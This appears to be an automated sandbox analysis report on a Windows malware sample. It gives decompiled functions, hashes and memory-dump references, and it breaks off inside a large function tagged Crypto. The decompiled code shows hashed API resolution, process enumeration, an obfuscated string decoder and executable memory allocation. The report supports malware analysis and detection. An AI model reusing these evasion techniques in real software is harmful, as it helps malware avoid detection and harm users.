Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: FileLibraryLoadPointer
String ID:
API String ID: 905221306-0
Opcode ID: 56827a51e64df8ba1fdda761d74d5a4685ffdf82fde54daeb8cd823cf7d7b49d
Instruction ID: f1c90c78482297122f3666426e6bb283ff19905dda8ec921e53b5fb89b88726d
Opcode Fuzzy Hash: 56827a51e64df8ba1fdda761d74d5a4685ffdf82fde54daeb8cd823cf7d7b49d
Instruction Fuzzy Hash: F4D09232004249BFDF026EC1EC02D9A3B26EB08760F004055FA58180A19A73A5B1AB95

Uniqueness

Uniqueness Score: 0.06%

Function 00407414, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407414(void* _a4, struct tagPROCESSENTRY32W _a8) {
				int _t4;
				void* _t5;

				E004010BB(_t5, 1, 0x98750f33);
				_t4 = Process32NextW(_a4, _a8); // executed
				return _t4;
			}

0x0040741e
0x0040742b
0x0040742e

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

Process32NextW.KERNEL32(?,?,?,004074C5,?,?,00403724), ref: 0040742B

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: LibraryLoadNextProcess32
String ID:
API String ID: 91957192-0
Opcode ID: a910bd63565bb20a07854bb9ae4f4fd81ea426cbce537143263a8ffc066503d7
Instruction ID: 49fb1386a40dd17350bd2f32d6117b3a78510ddfe3963f41e6d00661561aa618
Opcode Fuzzy Hash: a910bd63565bb20a07854bb9ae4f4fd81ea426cbce537143263a8ffc066503d7
Instruction Fuzzy Hash: E9C08C3200820C3EEB002AC1EC02D883B68CB00730F004026F90C080E1D9B366904195

Uniqueness

Uniqueness Score: 0.29%

Function 0040742F, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040742F(void* _a4, struct tagPROCESSENTRY32W* _a8) {
				void* _t3;
				void* _t4;

				_t3 = E004010BB(_t4, 1, 0xfbc6485b);
				Process32FirstW(_a4, _a8); // executed
				return _t3;
			}

0x00407439
0x00407446
0x00407449

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

Process32FirstW.KERNEL32(?,?,?,00407492,?,?), ref: 00407446

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: FirstLibraryLoadProcess32
String ID:
API String ID: 3567986155-0
Opcode ID: 3a52e7fc4169fb41a058651a0e303e132983605bd895a8c00aacfcff9a2c6c02
Instruction ID: ecfcbed99ac4d2f9940d56cab3765e37b847c82f27bb34750fd26edc2742bf33
Opcode Fuzzy Hash: 3a52e7fc4169fb41a058651a0e303e132983605bd895a8c00aacfcff9a2c6c02
Instruction Fuzzy Hash: A3C09B3204C24C7FEF093AD1EC47D593B59DB44B74F10402AFA1C585F19DB3669155A5

Uniqueness

Uniqueness Score: 0.28%

Function 00409551, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409551(void* _a4, struct tagPROCESSENTRY32W _a8) {
				int _t4;
				void* _t5;

				E004010BB(_t5, 1, 0x19f78c90);
				_t4 = Process32First(_a4, _a8); // executed
				return _t4;
			}

0x0040955b
0x00409568
0x0040956b

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

Process32First.KERNEL32(00000000,0040A24C,?,0040A24C,00000000,00000000), ref: 00409568

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: FirstLibraryLoadProcess32
String ID:
API String ID: 3567986155-0
Opcode ID: d0ddd12c0031da06d414e1dfcec4f89041c77d79d0201a138d55a24e372341f7
Instruction ID: b12db8e179a96f76404f0508289e00b5c5c56ef48f6cf4d284d9f3d26cd0d4c2
Opcode Fuzzy Hash: d0ddd12c0031da06d414e1dfcec4f89041c77d79d0201a138d55a24e372341f7
Instruction Fuzzy Hash: ABC08C320083083EEA046AC1EC02E883B18CB00720F004016FA0C080A199B36590018A

Uniqueness

Uniqueness Score: 0.28%

Function 00409599, Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409599(void* _a4, struct tagPROCESSENTRY32W _a8) {
				int _t4;
				void* _t5;

				E004010BB(_t5, 1, 0xc930ea1e);
				_t4 = Process32Next(_a4, _a8); // executed
				return _t4;
			}

0x004095a3
0x004095b0
0x004095b3

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

Process32Next.KERNEL32(?,0040A2EC,?,0040A2EC,?,00000000), ref: 004095B0

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: LibraryLoadNextProcess32
String ID:
API String ID: 91957192-0
Opcode ID: 796d52f84b3e2e3440d787b7e2782c7f12ab0992b22bd290da4fd0393f757811
Instruction ID: 29168e72c70c2a36e99466801d729076a7c74d59c7cf1e9047d6f9963cc6115b
Opcode Fuzzy Hash: 796d52f84b3e2e3440d787b7e2782c7f12ab0992b22bd290da4fd0393f757811
Instruction Fuzzy Hash: 17C02B3200820C3FEF003AC1EC13D483B19EB00730F00C016FD0C180E2DEB365900186

Uniqueness

Uniqueness Score: 0.29%

Function 00407F69, Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407F69(void* _a4) {
				int _t3;
				void* _t4;

				E004010BB(_t4, 1, 0x7b4842c1);
				_t3 = FindClose(_a4); // executed
				return _t3;
			}

0x00407f73
0x00407f7d
0x00407f80

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

FindClose.KERNELBASE(00408CBA,?,00408CBA,00000000), ref: 00407F7D

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: CloseFindLibraryLoad
String ID:
API String ID: 944860524-0
Opcode ID: b505b5d175682cf9a9fe2318350b19666b671fa0ee4709143f50cc0265b62e19
Instruction ID: d0ee52981aef15a9517b3c138607ab6b564ecc4ae673f37f48ff5398c007f283
Opcode Fuzzy Hash: b505b5d175682cf9a9fe2318350b19666b671fa0ee4709143f50cc0265b62e19
Instruction Fuzzy Hash: 45B09B3114C2083EE90476D1FC47D553758C740774F100116F94C1C5D19DA365910496

Uniqueness

Uniqueness Score: 0.20%

Function 0040143B, Relevance: 1.4, APIs: 1, Instructions: 180
memoryCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0040143B(intOrPtr* _a4, signed int _a8) {
				void* _v6;
				signed char _v7;
				void* _v8;
				signed char _v9;
				signed char _v10;
				char _v11;
				unsigned char _v12;
				signed int _v16;
				void* _v20;
				signed int _v24;
				void* __ebx;
				char* _t63;
				void* _t69;
				signed int _t97;
				signed int _t98;
				void* _t99;
				signed char _t100;
				void* _t104;
				void* _t110;
				void* _t112;
				signed int _t123;
				intOrPtr* _t126;
				signed char _t129;
				signed char _t133;
				signed int _t134;
				char* _t136;
				signed int _t137;
				signed int _t138;
				void* _t139;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;

				_t140 = 0;
				_v16 = _v16 & 0;
				_t136 = 0x413000;
				_t63 = 0x413000;
				if( *0x413000 == 0) {
					L2:
					_t97 = 3;
					asm("cdq");
					asm("cdq");
					_t98 = (8 + (_a8 - (_a8 + 2) % _t97) * 4) / _t97;
					_v24 = _t98;
					E004010BB(_t98, 1, 0x697a6afe);
					_t69 = VirtualAlloc(0, _t98 + 1, 0x3000, 4); // executed
					_t99 = _t69;
					_v20 = _t99;
					if(_t99 == 0) {
						return _t69;
					}
					if(_a8 == _t140) {
						L20:
						 *((char*)(_t99 + _v24)) = 0;
						if( *0x413000 == 0) {
							L22:
							return _t99;
						} else {
							goto L21;
						}
						do {
							L21:
							 *_t136 =  *_t136 + 0xe7;
							_t136 = _t136 + 1;
						} while ( *_t136 != 0);
						goto L22;
					}
					_t137 = _a8;
					_t110 = 3;
					do {
						_t126 = _a4;
						_t137 = _t137 - 1;
						_a8 = _t137;
						 *((char*)(_t142 + _t140 - 4)) =  *_t126;
						_t140 = _t140 + 1;
						_t100 = _v8;
						_a4 = _t126 + 1;
						_t129 = _v7;
						if(_t140 != _t110) {
							goto L9;
						}
						_t141 = _v20;
						_v12 = _t100 >> 2;
						_v11 = ((_t100 & 0x00000003) << 4) + (_t129 >> 4);
						_v10 = ((_t129 & 0x0000000f) << 2) + (_t129 >> 6);
						_t123 = _v16;
						_t139 = 0;
						_v9 = _t129 & 0x0000003f;
						do {
							 *((char*)(_t141 + _t123)) =  *((intOrPtr*)(( *(_t142 + _t139 - 8) & 0x000000ff) + 0x413000));
							_t123 = _t123 + 1;
							_t139 = _t139 + 1;
						} while (_t139 < 4);
						_t137 = _a8;
						_t140 = 0;
						_v16 = _t123;
						_t110 = 3;
						L9:
					} while (_t137 != 0);
					_t136 = 0x413000;
					if(_t140 == 0) {
						_t99 = _v20;
						goto L20;
					}
					if(_t140 < _t110) {
						_t104 = 3;
						E0040C70B( &_v8 + _t140, 0, _t104 - _t140);
						_t143 = _t143 + 0xc;
						_t129 = _v7;
						_t100 = _v8;
						_t110 = 3;
					}
					_a8 = _a8 & 0x00000000;
					_v12 = _t100 >> 2;
					_v11 = ((_t100 & 0x00000003) << 4) + (_t129 >> 4);
					_t99 = _v20;
					_t133 = ((_t129 & 0x0000000f) << 0x00000002 & 0x0000003f) + ((_t129 & 0x0000000f) << 2 >> 6);
					_v9 = _t133;
					_t50 = _t140 + 1; // 0x2
					_v10 = _t133;
					_t134 = _v16;
					if(_t50 <= 0) {
						L17:
						if(_t140 < _t110) {
							E0040C70B(_t99 + _t134, 0x3d, _t110 - _t140);
						}
						goto L20;
					} else {
						_t138 = _a8;
						_t54 = _t140 + 1; // 0x2
						_t112 = _t54;
						do {
							 *((char*)(_t99 + _t134)) =  *((intOrPtr*)(( *(_t142 + _t138 - 8) & 0x000000ff) + 0x413000));
							_t134 = _t134 + 1;
							_t138 = _t138 + 1;
						} while (_t138 < _t112);
						_t136 = 0x413000;
						_t110 = 3;
						goto L17;
					}
				} else {
					goto L1;
				}
				do {
					L1:
					 *_t63 =  *_t63 + 0x19;
					_t63 = _t63 + 1;
				} while ( *_t63 != 0);
				goto L2;
			}

0x00401443
0x00401445
0x00401450
0x00401455
0x00401457
0x00401462
0x00401467
0x00401470
0x0040147e
0x00401481
0x00401483
0x00401486
0x0040149a
0x0040149c
0x0040149e
0x004014a3
0x00401607
0x00401607
0x004014ac
0x004015e6
0x004015e9
0x004015f4
0x004015ff
0x00000000
0x00000000
0x00000000
0x00000000
0x004015f6
0x004015f6
0x004015f6
0x004015f9
0x004015fa
0x00000000
0x004015f6
0x004014b2
0x004014b7
0x004014b8
0x004014b8
0x004014bb
0x004014bc
0x004014c1
0x004014c5
0x004014c6
0x004014ca
0x004014d0
0x004014d5
0x00000000
0x00000000
0x004014d7
0x004014e4
0x004014f3
0x00401507
0x0040150a
0x0040150d
0x0040150f
0x00401512
0x0040151d
0x00401520
0x00401521
0x00401522
0x00401527
0x0040152a
0x0040152e
0x00401531
0x00401532
0x00401532
0x00401536
0x0040153d
0x004015e3
0x00000000
0x004015e3
0x00401545
0x00401549
0x00401557
0x0040155f
0x00401562
0x00401565
0x0040156a
0x0040156a
0x0040156b
0x00401577
0x0040158c
0x0040158f
0x00401598
0x0040159a
0x0040159d
0x004015a0
0x004015a3
0x004015a8
0x004015cc
0x004015ce
0x004015d9
0x004015de
0x00000000
0x004015aa
0x004015aa
0x004015ad
0x004015ad
0x004015b0
0x004015bb
0x004015be
0x004015bf
0x004015c0
0x004015c6
0x004015cb
0x00000000
0x004015cb
0x00000000
0x00000000
0x00000000
0x00401459
0x00401459
0x00401459
0x0040145c
0x0040145d
0x00000000

APIs

Part of subcall function 004010BB: LoadLibraryA.KERNEL32(15595754,?,00000000), ref: 0040136B

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004), ref: 0040149A

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AllocLibraryLoadVirtual
String ID:
API String ID: 3550616410-0
Opcode ID: 519f8bef114770f4e6d3742cb0572ab02a836a1670e7b489352db8d6085a19fb
Instruction ID: 40170816b3e562260ec3ad6baf781f5f8794dae6afd71e7f2a53e9655b932742
Opcode Fuzzy Hash: 519f8bef114770f4e6d3742cb0572ab02a836a1670e7b489352db8d6085a19fb
Instruction Fuzzy Hash: 28514972E04284AFEB128FA8C8917EEBFA4DB66314F0440AAD5956B3C3D2794B06C754

Uniqueness

Uniqueness Score: 0.00%

Function 00405C38, Relevance: 1.3, APIs: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C38(long* __ecx, long _a4) {
				long _t7;
				void* _t8;
				long* _t12;

				_t7 = _a4;
				_t12 = __ecx;
				__ecx[2] = 0;
				__ecx[3] = 0;
				 *__ecx = _t7; // executed
				_t8 = VirtualAlloc(0, _t7, 0x3000, 0x40); // executed
				 *((intOrPtr*)(_t12 + 4)) = 0;
				 *(_t12 + 8) = _t8;
				 *(_t12 + 0xc) = _t8;
				return _t12;
			}

0x00405c3b
0x00405c42
0x00405c4d
0x00405c50
0x00405c53
0x00405c55
0x00405c5b
0x00405c5e
0x00405c61
0x00405c69

APIs

VirtualAlloc.KERNELBASE(00000000,0040C0AD,00003000,00000040,00000000,?,?,0040C0AD,?,?,?,?,?,?,?,0040165A), ref: 00405C55

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 28a2fccb5d185612073d643c3c06100d344b06b880bbc44c70694c27889ce6a0
Instruction ID: 85b512835ba7c590317c72d20d2e27c3a9c38f96751e8e1d19ae78fde3547739
Opcode Fuzzy Hash: 28a2fccb5d185612073d643c3c06100d344b06b880bbc44c70694c27889ce6a0
Instruction Fuzzy Hash: B0E09AB2A017159FD3208F5BD844E83FFECEF94B51B10C42FA799C7660D6B4A4408B94

Uniqueness

Uniqueness Score: 0.00%

Function 001E0540, Relevance: 1.3, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 001E0563

Memory Dump Source

Source File: 00000005.00000002.1853866261.001E0000.00000040.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction ID: dc3e6c086251d923ad5a4b9b23cda14bf0a87731ad64425f0b90476427916352
Opcode Fuzzy Hash: d23f5b4491c7af0992820b7baa5db14a80b82636fbc31ebfbd540f84cb94a2fc
Instruction Fuzzy Hash: BCE07E7590020CAFCF05DFD4D94589DBBB5EB08310F00809AED14A6211D7719A60AB91

Uniqueness

Uniqueness Score: 0.00%

Function 001E3A54, Relevance: 1.3, APIs: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(?,?,?,?), ref: 001E3A77

Memory Dump Source

Source File: 00000005.00000002.1854484266.001E3000.00000040.sdmp, Offset: 001E3000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1148fe3ff7d1d44f5522a9f59b3ae2c3223de43c641a5f18f72e83c756a4fac7
Instruction ID: 12b7d1c488f80a5cb2bd95aff6f5e55de1c0123d8249b1cfab0f5a3b413687f6
Opcode Fuzzy Hash: 1148fe3ff7d1d44f5522a9f59b3ae2c3223de43c641a5f18f72e83c756a4fac7
Instruction Fuzzy Hash: 3EE07E7590020CAFCF05DF95D94589DBBB5EB08210F00809AED14A7251D7319A20EB51

Uniqueness

Uniqueness Score: 0.00%

Function 001E0510, Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 001E0530

Memory Dump Source

Source File: 00000005.00000002.1853866261.001E0000.00000040.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction ID: 8a97442b4b50f100f003a368a34a27051f9bda44f1eb1d9b80779e6ec4a974ee
Opcode Fuzzy Hash: 5f66c99753e64f02ff2b462dafc4f8f36d502f87b07fb646d32efc9fa3abc917
Instruction Fuzzy Hash: B8E09275D0020CEF8B05DFD4C84589DBBB5EB18310F008099ED1497310D6319A60DB91

Uniqueness

Uniqueness Score: 0.03%

Function 001E3A24, Relevance: 1.3, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 001E3A44

Memory Dump Source

Source File: 00000005.00000002.1854484266.001E3000.00000040.sdmp, Offset: 001E3000, based on PE: false

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 939af9814f42319dc4dd3c30e38ef22b6441b80b448033bf75d33424e6efa72f
Instruction ID: ca08bd034935b8e9504c5250ff0f8167cccf857635480b44bac84fa58aef95a7
Opcode Fuzzy Hash: 939af9814f42319dc4dd3c30e38ef22b6441b80b448033bf75d33424e6efa72f
Instruction Fuzzy Hash: 63E09275D0020CEF8F05DF95C84589CBBB5EB18210F008099EC1497310D6319A60DB91

Uniqueness

Uniqueness Score: 0.03%

Function 001E04B0, Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(?,?), ref: 001E04CD

Memory Dump Source

Source File: 00000005.00000002.1853866261.001E0000.00000040.sdmp, Offset: 001E0000, based on PE: false

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
Instruction ID: 6070ff3b65eae01b8d50a3f24402a82e5fb1b0921e933bfc10e5b17b0f950688
Opcode Fuzzy Hash: eda64a455f148b8a09e352fe24c13dc281b9b593ee549f94b6634f8ab68eaba8
Instruction Fuzzy Hash: 08E0B634D0010CAF8B40EFD4C44589CFBB4EB08310F008096EC0497310D6315A509B81

Uniqueness

Uniqueness Score: 0.04%

Function 001E3964, Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNELBASE(?,?), ref: 001E3981

Memory Dump Source

Source File: 00000005.00000002.1854484266.001E3000.00000040.sdmp, Offset: 001E3000, based on PE: false

Similarity

API ID: AllocGlobal
String ID:
API String ID: 3761449716-0
Opcode ID: f64653b21dd12de55cebe4a93fd1388b0dd14e27de4500d878950b8011baaba0
Instruction ID: e9f67e005e387238c7d4a3d223ee5a22d3878acff03733eac98c7d928e608096
Opcode Fuzzy Hash: f64653b21dd12de55cebe4a93fd1388b0dd14e27de4500d878950b8011baaba0
Instruction Fuzzy Hash: C7E02675D0010CAF8B45EF95D54589CFBB5EB18210F108196EC5497351D6315A54DB51

Uniqueness

Uniqueness Score: 0.04%

Function 0040C6BA, Relevance: 1.3, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C6BA(long _a4) {
				void* _t2;

				_t2 = VirtualAlloc(0, _a4, 0x3000, 4); // executed
				return _t2;
			}

0x0040c6c9
0x0040c6d0

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,00403FBE,00000202), ref: 0040C6C9

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 2e5a6f33982ca4addfaf2bc93c49b75bdd155f24dff60d1a68144c3b18875f53
Instruction ID: 310176a2862c21f253e0be7a03d4837190a8cddb5ebf54082a7712ac3de8580d
Opcode Fuzzy Hash: 2e5a6f33982ca4addfaf2bc93c49b75bdd155f24dff60d1a68144c3b18875f53
Instruction Fuzzy Hash: 0AB09231285308B7EA121BC2AC06FC43E1C9708B65F008011F70D984E086A261504699

Uniqueness

Uniqueness Score: 0.00%

Function 0040C6D1, Relevance: 1.3, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040C6D1(void* _a4) {
				int _t2;

				_t2 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t2;
			}

0x0040c6de
0x0040c6e5

APIs

VirtualFree.KERNELBASE(00000000,00000000,00008000,?,00408010,00000000,?,?,00408ACF,?,00000000,00000000,00000000), ref: 0040C6DE

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 11fe1fefb51e8916a18ebae5772617c4d4be2fd8c5de324647e13daa5b2656d6
Instruction ID: 91bca7f4c6e149952bd4a053496199e4c4bfd54e9d8b3517ec4c0b82b93cde5d
Opcode Fuzzy Hash: 11fe1fefb51e8916a18ebae5772617c4d4be2fd8c5de324647e13daa5b2656d6
Instruction Fuzzy Hash: E4B09230280208B7DA101B82EC06B843E18A704A90F108020B609184A08AA265504A88

Uniqueness

Uniqueness Score: 0.03%

Function 00405C6C, Relevance: 1.3, APIs: 1, Instructions: 5
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C6C(void* __ecx) {
				int _t2;

				_t2 = VirtualFree( *(__ecx + 8), 0, 0x8000); // executed
				return _t2;
			}

0x00405c76
0x00405c7c

APIs

VirtualFree.KERNELBASE(?,00000000,00008000,0040C1A3,?,?,?,?,?,?,0040165A,00000000,00000020,00000001,00000000), ref: 00405C76

Memory Dump Source

Source File: 00000005.00000002.1855704108.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1855692711.00400000.00000002.sdmp Download File
Associated: 00000005.00000002.1855724332.00411000.00000002.sdmp Download File
Associated: 00000005.00000002.1855736795.00413000.00000004.sdmp Download File
Associated: 00000005.00000002.1855752485.0041A000.00000002.sdmp Download File

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 54f60ca6922f387f437dd43d2ddf32f2a20734b04101a8ba5e957c36494a1f6b
Instruction ID: c22e5abcc043cf26e115ac764e395d748348cf21cdcbea08a05af3a56246722e
Opcode Fuzzy Hash: 54f60ca6922f387f437dd43d2ddf32f2a20734b04101a8ba5e957c36494a1f6b
Instruction Fuzzy Hash: D8A02230B80200ABEE208B00CC0AF003E20BB00B80F30C0A0B30A2C0F0CBA32883CF0C

Uniqueness

Uniqueness Score: 0.03%

Non-executed Functions

Function 00411DD0, Relevance: 118.1, APIs: 61, Strings: 6, Instructions: 893
memorywindowfileUNIQUECrypto

Download Yara Rule

C-Code - Quality: 78%

			E00411DD0() {
				signed int _v12;
				struct HINSTANCE__* _v208;
				char _v588;
				struct tagPAINTSTRUCT _v608;
				struct tWAVEFORMATEX _v628;
				struct tagPOINT _v644;
				struct tagPOINT _v652;
				void* _v668;
				char _v672;
				long _v676;
				signed int _v680;
				char _v684;
				struct HWAVEOUT__* _v688;
				struct HWAVEOUT__* _v692;
				char _v693;
				void* _v696;
				long _v700;
				signed int _v701;
				struct tagPOINT _v720;
				void* _v724;
				struct tagPAINTSTRUCT _v736;
				int _v744;
				struct tagPOINT _v756;
				int _v760;
				int _v764;
				signed int _v768;
				int _v772;
				signed int _v784;
				int _v788;
				void* _v792;
				intOrPtr* _v796;
				char _v800;
				int _v816;
				void* _v820;
				void* _v824;
				intOrPtr* _v852;
				intOrPtr _v856;
				char _v860;
				signed int _v872;
				struct HDC__* _v876;
				intOrPtr _v880;
				intOrPtr _v912;
				char _v944;
				char _v1012;
				char _v1032;
				intOrPtr _v1048;
				char* _v1052;
				int _v1064;
				void* _v1072;
				void* _v1092;
				long _v1096;
				int _v1100;
				char* _v1104;
				struct HWND__* _v1108;
				intOrPtr _v1112;
				void* _v1116;
				char _v1120;
				struct HWND__* _v1128;
				intOrPtr _v1132;
				int _v1136;
				signed int _v1144;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t277;
				struct HWND__* _t278;
				intOrPtr _t284;
				long _t286;
				struct HDC__* _t293;
				long* _t297;
				int _t305;
				signed int _t306;
				int _t307;
				intOrPtr _t310;
				char _t313;
				char* _t315;
				signed int _t316;
				struct HWND__* _t317;
				int _t319;
				int _t323;
				signed int _t328;
				signed int _t333;
				intOrPtr _t336;
				signed int _t341;
				char* _t360;
				signed int _t363;
				int _t365;
				int _t367;
				signed int _t368;
				signed int _t372;
				int _t373;
				signed int _t379;
				signed int _t383;
				int _t384;
				signed int _t385;
				long _t387;
				char _t391;
				struct HWAVEOUT__* _t392;
				int* _t393;
				void* _t396;
				int _t401;
				intOrPtr _t413;
				void* _t414;
				struct HDC__* _t415;
				signed int _t416;
				int _t417;
				intOrPtr _t418;
				signed int _t419;
				signed int _t420;
				signed int _t421;
				signed int _t429;
				long _t432;
				intOrPtr* _t434;
				intOrPtr* _t438;
				intOrPtr* _t442;
				int _t443;
				intOrPtr* _t448;
				struct HWAVEOUT__* _t455;
				signed int _t460;
				struct HMONITOR__* _t471;
				struct HDC__* _t483;
				signed int _t484;
				void _t490;
				signed int _t504;
				signed short _t517;
				void* _t522;
				intOrPtr _t524;
				long _t531;
				signed int _t532;
				signed int _t535;
				signed int _t536;
				signed int _t543;
				int _t551;
				struct HWAVEOUT__* _t556;
				struct HWND__* _t557;
				int _t559;
				struct HWND__* _t561;
				int _t563;
				char _t565;
				signed int _t567;
				struct HWND__* _t577;
				signed int _t578;
				signed int _t581;
				intOrPtr _t584;
				int _t591;
				signed int _t596;
				signed int _t598;
				signed int _t602;
				signed int _t604;
				struct HWAVEOUT__* _t610;
				long _t629;
				signed short _t631;
				void* _t641;
				int _t644;
				signed int _t645;
				int _t651;
				signed int _t655;
				signed int _t661;
				intOrPtr _t662;
				void* _t664;
				signed int _t665;
				signed int _t671;
				void* _t676;
				int _t679;
				signed int _t681;
				int _t683;
				char _t684;
				signed int _t685;
				signed int _t686;
				void* _t688;
				struct HWAVEOUT__* _t689;
				int _t690;
				struct HDC__* _t691;
				struct HWND__* _t692;
				int _t693;
				signed int _t694;
				signed int _t696;
				unsigned int _t697;
				unsigned int _t698;
				signed int _t701;
				void* _t702;
				int _t703;
				signed int _t704;
				int _t705;
				int _t707;
				char* _t708;
				void* _t710;
				intOrPtr _t711;
				struct HDC__* _t712;
				struct HDC__* _t715;
				int _t716;
				struct HWND__* _t717;
				void* _t721;
				long _t726;
				void* _t728;
				struct HWND__* _t729;
				signed int _t732;
				void* _t739;
				void* _t740;
				void* _t741;
				void* _t742;
				void* _t743;
				void* _t744;
				void* _t746;
				void* _t760;
				void* _t784;
				intOrPtr _t802;
